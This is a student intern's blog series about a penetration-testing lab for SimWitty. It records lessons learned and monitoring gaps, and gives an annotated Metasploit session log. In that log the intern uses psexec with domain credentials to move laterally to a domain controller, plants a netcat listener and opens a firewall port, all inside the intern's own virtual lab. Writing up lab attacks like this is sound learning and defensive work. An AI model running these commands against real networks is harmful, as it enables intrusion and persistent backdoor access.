SimWitty Internship

SimWitty Internship: Week 15

2010-04-23T11:58:00.002-05:00

Well, this week wraps up my pentesting work for Simwitty. I have had a great time doing this work and I have learned quite a bit. In my classes we did some cursory overviews on pentesting, but never delved into it too deeply. This internship has really opened my eyes to the work that is involved in creating a successful penetration test. I think I made some hits and some misses which I would like to point out here.

Hits

I learned a huge amount about the Metasploit Framework and its capabilities.
I became more familiar with Windows PowerShell and it's use in automating tasks.
I was enlightened by having to think of all the various aspects of a system that would be changed by nefarious activity on the machine, and thus need to be monitored.
I became somewhat familiar with Microsoft SQL Server; how to set it up and work with it.
I learned quite abit concerning virtual machines and networks; what type of communication is possible, how it can be monitored.
I got to work on a project with professional people and feel like I made contributions to that project.

Misses

I was overambitious on what I could do in a given time frame and the monitoring aspects of the lab suffered for it.
I should have set up Snort to use output alert_full along with the database output. My SQL skills are limited (at this point) and I couldn't view the database entries in any way that made sense.
Installing IIS on srv-snort was a waste of time since I didn't have time to investigate it.
I used the database capabilities of Metasploit to organize and keep track of all the attack sessions but once again I don't know how to turn information in a database into usable information.
I should have installed something like the Dradis framework to keep better track of what I was doing and what were the results.
Every attack should have been correlated with information showing that it was either detected or not detected. I didn't set my lab up to properly do this.
I should have started off by finding a 'pentesting checklist' and adapted it to my lab. Why reinvent the wheel?

Final Thoughts
I think there are a lot of directions that an internship like this could take in the future. My lab was focused on client side attacks and pivoting, but I didn't really have time to investigate the pivoting aspect closely enough. That could be the target of a future internship. My attack was extremely noisy and obvious, perhaps someone could adapt it by concentrating more on stealth. An internship could possibly be done on creating a 'toolkit' for use once you have breached a host. I installed some programs but they were obvious and the installation was painful, can we use automation for toolkit installation? The lab network could be created with a "treasure" embeded somewhere within, and the intern's job is to go "treasure hunting". It would also be good to somehow tie in this lab setup with the actual Simwitty appliance, but this may be pushing resource usage on an interns machine.

I think that my lab setup (and documentation of it) could possibly aid future interns by reducing the time for planning and install. They now have a blueprint to follow (and improve) so that they can spend more time actually doing work within the lab environment. Finally I want to say thank you to everyone involved with Simwitty. Time is precious and the fact that you all give up some of yours to make this project work is praiseworthy. I have had a great time working on this project and hopefully can continue to be a contributor once the job issue is taken care of.

SimWitty Internship: Week 14

2010-04-19T00:16:00.002-05:00

Monitoring is definitely the hard part. There is so much to watch on just one system, To name just a few examples:
File system changes
Account/Group changes
Directory service changes
Registry changes
Running processes/services
Now multiply that by the number of systems on the network and you have a real nightmare on your hands. The need for a Security Information Management System is pretty apparent. On my systems, I could see file system changes and account changes, etc. pretty easily. I doubt this would be the case on production systems where all kinds of activity is taking place.

Some clues that bad things were going on was fairly obvious: psexec is plainly visible in the system event log on srv-DC, it logs every time it starts or stops, but no information regarding what it was doing. Netcat all of a sudden showed up in the %SystemRoot% on srv-DC, Directories were added to C:\Program Files on wks-XP1, etc. I'm sure that the new event logging system on the Server 2008 OS is much better, the key is being able to find what you need among all the information. The following shows counts and types of activity in just one attack session from the two servers:

srv-DC
ID   Task Cat.                  Occurrences
------------------------------------------------------------------------------------------------------------
1102 Log clear                            1
4624 Logon                              360
4634 Logoff                             358
4648 Logon                                8
4662 Directory Service Access             3
4672 Special Logon                      284
4768 Kerberos Authentication Service     35
4769 Kerberos Service Ticket Operations 139
4776 Credential Validation                2
.......................................1190 tot

srv-SNORT
ID   Task Cat.              Occurrences
----------------------------------------------------------------
1102 Log clear                       1
4624 Logon                           2
4634 Logoff                          2
4648 Logon                           1
4656 Registry                        6
4658 Other Object Access Events      5
4662 Other Object Access Events     10
4663 Registry                        2
4672 Special Logon                   2
4688 Process Creation               26
4689 Process Termination            27
4696 Process Creation               17
5156 Filtering Platform Connection 215
5158 Filtering Platform Connection  45
...................................361 tot

I'm surprised that I didn't see any process creation/termination events on srv-DC... I thought I had auditing set properly. When I looked closer, I had auditing set in the GPO for the SimWitty OU but it apparently didn't affect srv-DC. I'm not sure if it was overridden by the local security policy or the default domain controller policy or what. I guess I should have been sure I turned auditing on everywhere. It's plain to see why they say one of the biggest reasons for breaches is through simple misconfiguration. The more complex a system is, the harder it is to be sure you have every little aspect of configuration right.

SimWitty Internship: Week 13 - Addendum

2010-04-14T12:29:00.126-05:00

(NOTE: I apologize for the screwed up indentation and formatting in the latter part of this post but the editor for this blog sucks and I don't have time to do all the html by hand)

In my last post I noted that I would continue with the attempted compromise for a couple more days. I'm happy to report that I was able to succeed in getting a hole through the gateway firewall and a netcat listener on an internal workstation, thanks to Mark Russinovich and Psexec. The following is an annotated scrollback buffer from the attack machine wks-Matriux:

/* My scrollback didn't capture everything... this is the tail end of output from ps shortly after a meterpreter session was created */

1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe

meterpreter > shell
Process 1644 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program files\ps>c:\bin\whoami
c:\bin\whoami
TEST\usr1

/* This is the start of my attempts to work with psexec, took a bit of fiddling to get it right. It is important to use the /accepteula argument on first run, or a window pops up that you can't see or respond to. After that, I dont' think it's necessary */

C:\Program files\ps>psexec /accepteula \\srv-dc -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\srv-dc -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

/* I'll leave this first banner in, because Mark deserves credit. I will eliminate the rest though (should have a -q switch?) */

PsExec v1.59 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com

Logon failure: unknown user name or bad password.
PsExec could not start c:\windows\system32\netsh.exe on WKS-XP1:

C:\Program files\ps>psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

Logon failure: unknown user name or bad password.
PsExec could not start c:\windows\system32\netsh.exe on WKS-XP1:

C:\Program files\ps>psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

Logon failure: unknown user name or bad password.
PsExec could not start netsh on WKS-XP1:

/* I finally figured you had to supply the usr name in DOMAIN\user format. I cheated a little since psexec doesn't "pass the hash" I used the real password. I think this is acceptable though, since the attacker already has the password hashes and would probably be able to crack the password. If nothing else, I could have created my own user and supplied the password, added it to the domain admin group, etc. */

C:\Program files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 whoami

psexec \\srv-DC -u TEST\usr1 -p usr1 whoami

whoami exited on srv-DC with error code 0.

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

NAT must be installed first.
netsh exited on WKS-XP1 with error code 0.

/* I am not quite sure why it was telling me this. Maybe because you have to be elevated to run the command, but as you'll see later, it warns me that I am not elevated. */

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp

The following command was not found: advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp.

netsh exited on WKS-XP1 with error code 1.

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

The following command was not found: "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp".

netsh exited on WKS-XP1 with error code 1.

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

The system cannot find the file specified.
Starting netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=
PsExec could not start netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp on WKS-XP1:

C:\Program files\ps>copy c:\bin\nc.exe .
copy c:\bin\nc.exe .
1 file(s) copied.

C:\Program files\ps>dir
dir
Volume in drive C has no label.
Volume Serial Number is F476-9322

Directory of C:\Program files\ps

04/13/2010 11:05 PM dir .
04/13/2010 11:05 PM dir ..
04/13/2010 10:41 PM 7,005 Eula.txt
12/29/2004 02:07 PM 61,440 nc.exe
04/13/2010 10:41 PM 143,360 psexec.exe
04/13/2010 10:41 PM 64,072 Pstools.chm
04/13/2010 10:42 PM 960 Pstools_README.TXT
5 File(s) 276,837 bytes
2 Dir(s) 8,279,678,976 bytes free

/* Here I copied netcat into the current directory, just to make it easier to work with. I then ran an nmap scan on srv-dc to see what ports were available. */

C:\Program files\ps>cd ..
cd ..

C:\Program Files>cd nmap
cd nmap

C:\Program Files\nmap>nmap -sS -F -n -v 192.168.2.1
nmap -sS -F -n -v 192.168.2.1

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-13 23:08 Central Standard Time
Initiating ARP Ping Scan at 23:08
Scanning 192.168.2.1 [1 port]
Completed ARP Ping Scan at 23:08, 0.85s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:08
Scanning 192.168.2.1 [100 ports]
Discovered open port 53/tcp on 192.168.2.1
Discovered open port 135/tcp on 192.168.2.1
Discovered open port 445/tcp on 192.168.2.1
Discovered open port 49157/tcp on 192.168.2.1
Discovered open port 49155/tcp on 192.168.2.1
Discovered open port 389/tcp on 192.168.2.1
Discovered open port 49154/tcp on 192.168.2.1
Discovered open port 88/tcp on 192.168.2.1
Discovered open port 5357/tcp on 192.168.2.1
Completed SYN Stealth Scan at 23:08, 2.68s elapsed (100 total ports)
Nmap scan report for 192.168.2.1
Host is up (0.027s latency).
Not shown: 91 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
5357/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
MAC Address: 08:00:27:33:48:CD (Cadmus Computer Systems)

Read data files from: C:\Program Files\nmap
Nmap done: 1 IP address (1 host up) scanned in 4.21 seconds
Raw packets sent: 193 (8490B) | Rcvd: 11 (482B)

C:\Program Files\nmap>cd ..\ps
cd ..\ps

/* In the following few lines, I was trying to copy nc.exe over to srv-dc and execute it. I guess I don't grasp the concept of how psexec uses the -c argument */

C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 5357

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 5357

Can't grab 192.168.2.1:5357 with bind
nc.exe exited on WKS-XP1 with error code 1.

C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 49157

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 49157

Can't grab 192.168.2.1:49157 with bind
nc.exe exited on WKS-XP1 with error code 1.

C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:

/* Here I decided to just try and do a direct copy. When that failed I tried to map the Admin$ share. That also failed, I think because I was using an impersonation token rather than actually running in a process owned by usr1. */

C:\Program Files\ps>copy nc.exe \\svr-DC\admin$
copy nc.exe \\svr-DC\admin$
The network path was not found.
0 file(s) copied.

C:\Program Files\ps>net use z: \\svr-DC\admin$
net use z: \\svr-DC\admin$

The server is not configured for remote administration.
More help is available by typing NET HELPMSG 3743.

C:\Program Files\ps>exit
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe
1216 svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe

meterpreter > migrate 348
[*] Migrating to 348...
[*] Migration completed successfully.
meterpreter > shell
Process 344 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>net use * \\192.168.2.1\admin$
net use * \\192.168.2.1\admin$

Drive Z: is now connected to \\192.168.2.1\admin$.
The command completed successfully.

/* It worked after migrating into a process owned by usr1 */

C:\Documents and Settings\usr1.TEST>cd c:\progra~1\ps
cd c:\progra~1\ps

C:\PROGRA~1\ps>copy nc.exe z:\
copy nc.exe z:\
1 file(s) copied.

C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:

/* huh? */

C:\PROGRA~1\ps>dir
dir
Volume in drive C has no label.
Volume Serial Number is F476-9322

Directory of C:\PROGRA~1\ps

04/13/2010 11:05 PM dir .
04/13/2010 11:05 PM dir ..
04/13/2010 10:41 PM 7,005 Eula.txt
12/29/2004 02:07 PM 61,440 nc.exe
04/13/2010 10:41 PM 143,360 psexec.exe
04/13/2010 10:41 PM 64,072 Pstools.chm
04/13/2010 10:42 PM 960 Pstools_README.TXT
5 File(s) 276,837 bytes
2 Dir(s) 8,279,658,496 bytes free

C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:

C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 c:\windows\nc.exe -h

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 c:\windows\nc.exe -h

The system cannot find the file specified.
PsExec could not start c:\windows\nc.exe on WKS-XP1:

C:\PROGRA~1\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

Can't grab 192.168.2.1:49157 with bind
nc.exe exited on srv-DC with error code 1.

/* Was the AcceptEULA screwing things up? now it runs on srv-dc */

C:\PROGRA~1\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 9999

psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 9999

^C
Terminate channel 1? [y/N] n
[-] Error running command shell: SignalException SIGUSR1

/* In the preceding, netcat started running, but I had no way to interact with it. Ctrl C tends to end up killing the whole session rather than just the command shell channel. I discovered a way to avoid this on Matriux (Ubuntu): Press alt+F2 and it pops up krunner (I think that's what it's called) click the icon just left of the text box and you get a thing much like Process Explorer. Find metasploit under Konsole (running as ruby), right click it and send it the SIGUSR1 signal and it usually puts you back into the meterpreter session. */

meterpreter > rev2self
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
344 cmd.exe x86 0 TEST\usr1 C:\WINDOWS\system32\cmd.exe
1776 psexec.exe x86 0 TEST\usr1 C:\PROGRA~1\ps\psexec.exe

meterpreter > shell
Process 1564 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>c:\bin\whoami
c:\bin\whoami
TEST\usr1

C:\Documents and Settings\usr1.TEST>exit
meterpreter > rev2self
meterpreter > getuid
Server username: TEST\usr1
meterpreter > shell
Process 1540 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>nc -vv -n 192.168.2.1 9999
nc -vv -n 192.168.2.1 9999
hello
(UNKNOWN) [192.168.2.1] 9999 (?): TIMEDOUT
sent 0, rcvd 0: NOTSOCK

C:\Program Files\ps>hello
'hello' is not recognized as an internal or external command,
operable program or batch file.

C:\Program Files\ps>exit
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
344 cmd.exe x86 0 TEST\usr1 C:\WINDOWS\system32\cmd.exe
1776 psexec.exe x86 0 TEST\usr1 C:\PROGRA~1\ps\psexec.exe

meterpreter > kill 1776
Killing: 1776
meterpreter > kill 344
Killing: 344
meterpreter > shell
Process 180 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>psexec \\server-dc -u TEST\usr1 -p usr1 tasklist

psexec \\server-dc -u TEST\usr1 -p usr1 tasklist

The network path was not found.
Couldn't access server-dc:
Make sure that the default admin$ share is enabled on server-dc.

C:\Program Files\ps>net use * /delete
net use * /delete
You have these remote connections:

Z: \\192.168.2.1\admin$

\\192.168.2.50\IPC$
\\srv-DC\IPC$
Continuing will cancel the connections.
Do you want to continue this operation? (Y/N) [N]:
No valid response was provided.

C:\Program Files\ps>net use Z: /delete
net use Z: /delete
Z: was deleted successfully.

C:\Program Files\ps>psexec \\svr-dc -u TEST\usr1 -p usr1 tasklist

psexec \\svr-dc -u TEST\usr1 -p usr1 tasklist

The network path was not found.
Couldn't access svr-dc:
Make sure that the default admin$ share is enabled on svr-dc.

C:\Program Files\ps>ping -n 2 192.168.2.1
ping -n 2 192.168.2.1

Pinging 192.168.2.1 with 32 bytes of data:

Reply from 192.168.2.1: bytes=32 time=2ms TTL=128
Reply from 192.168.2.1: bytes=32 time=5ms TTL=128

Ping statistics for 192.168.2.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 2ms, Maximum = 5ms, Average = 3ms

C:\Program Files\ps>exit
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe

meterpreter > exit

[*] Meterpreter session 1 closed. Reason: User exit

/* Things had gotten all screwed up by this point, with zombie processes running on srv-dc and
wks-xp1 so I killed the session, killed the zombies manually, and restarted the exploit.
*/

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
^C[-] Exploit failed:
[*] Exploit completed, but no session was created.
msf exploit(handler) > jobs

Jobs
====

No active jobs.

msf exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 2 opened (192.168.1.188:31337 -> 192.168.1.250:62571)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 2
[-] The 'stdapi' extension has already been loaded.

meterpreter > shell
Process 1028 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

The system cannot find the file specified.
Starting netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=
PsExec could not start netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp on srv-DC:

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name="jah-netcat" di

psexec \\srv-DC -u TEST\usr1 -p usr1 "netsh

netsh exited on srv-DC with error code 0.

/* The preceding appears weird because I had copied the command into the console, realized it was wrong, and tried to correct it. The console wouldn't let me backspace past the beginning of the line so I ended up running a "half command" via psexec. I do see that it works though. I finally got the quoting right. I think the dash in the name argument was screwing things up and needed to be quoted. */

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

psexec \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

The requested operation requires elevation.
netsh exited on srv-DC with error code 1.

C:\Program Files\ps>psexec \\srv-DC -u TEST\usr1 -s -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

psexec \\srv-DC -u TEST\usr1 -s -p usr1 netsh advfirewall firewall add rule name="jah-netcat" dir=in action=allow profile=any localip=any remoteip=any remoteport=any localport=9999 protocol=tcp

Ok.
netsh exited on srv-DC with error code 0.

/* Woo hoo! added the -s argument to run as system and it worked I now have a firewall rule in place */

